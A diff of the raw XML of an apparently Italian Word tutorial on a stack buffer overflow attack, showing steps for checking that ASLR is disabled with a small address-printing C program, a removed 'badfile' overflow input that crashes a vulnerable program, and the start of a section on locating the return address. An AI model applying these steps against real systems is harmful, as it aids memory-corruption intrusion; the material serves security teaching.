+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">int main() </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">{ </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:br/>
+              <w:t xml:space="preserve">        int x = 3; </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>$ echo "</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
-              <w:t>aaa</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>func</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>...(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">100 characters omitted)... </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>aaa</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">" &gt; </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>badfile</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(&amp;x); </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
               <w:br/>
-              <w:t xml:space="preserve">$ ./stack </w:t>
-            </w:r>
-            <w:r>
+              <w:t xml:space="preserve">        return 1; </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
               <w:br/>
-              <w:t>Segmentation fault (core dumped)</w:t>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5980,135 +6437,55 @@
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="3"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">c) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Controllare che l’ASLR sia disabilitato</w:t>
-      </w:r>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Standard"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Per assicurarsi che l’ASLR sia effettivamente disabilitato sulla macchina su cui si sta cercando di eseguire l’attacco, si può verificare andando ad eseguire il seguente script C:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Standard"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ASLR </w:t>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dopo aver compilato con </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Checker</w:t>
+          <w:i/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>gcc</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>prog.c</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il programma </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">si può semplicemente eseguirlo e vedere se gli indirizzi mostrati sono uguali o meno. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -6141,104 +6518,63 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">#include </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">void </w:t>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$ </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>func</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>gcc</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">int* a1) </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">{ </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">        </w:t>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>printf</w:t>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>prog.c</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(" :: a1’s address is 0x%x \n", (unsigned int) &amp;a1); </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">} </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">int main() </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">{ </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">        int x = 3; </w:t>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -o </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t>prog</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6247,6 +6583,100 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:lang w:val="it-IT"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>$ .</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">/prog </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>::</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> a1’s address is 0xbffff370 </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>$ .</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve">/prog </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Standard"/>
+              <w:spacing w:line="276" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
             </w:pPr>
@@ -6254,35 +6684,27 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:t xml:space="preserve">        </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t>func</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(&amp;x); </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t xml:space="preserve">        return 1; </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              </w:rPr>
-              <w:br/>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve">   </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>::</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> a1’s address is 0xbffff37</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              </w:rPr>
+              <w:t>0</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6303,45 +6725,166 @@
         <w:pStyle w:val="Standard"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Dopo aver compilato con </w:t>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se coincidono vuol dire che l’ASLR è stato disattivato con successo, se invece sono diversi significa che l’ASLR è ancora attivo, quindi si deve ripetere il comando riportato nella sezione </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>a)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> di questa guida.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">d) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Individuare il Return </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>gcc</w:t>
+          <w:b/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Address</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> il programma </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">si può semplicemente eseguirlo e vedere se gli indirizzi mostrati sono uguali o meno. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:br/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t>Ora lo scopo è q</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">uello di individuare dove il codice viene allocato all’interno dello </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="3"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
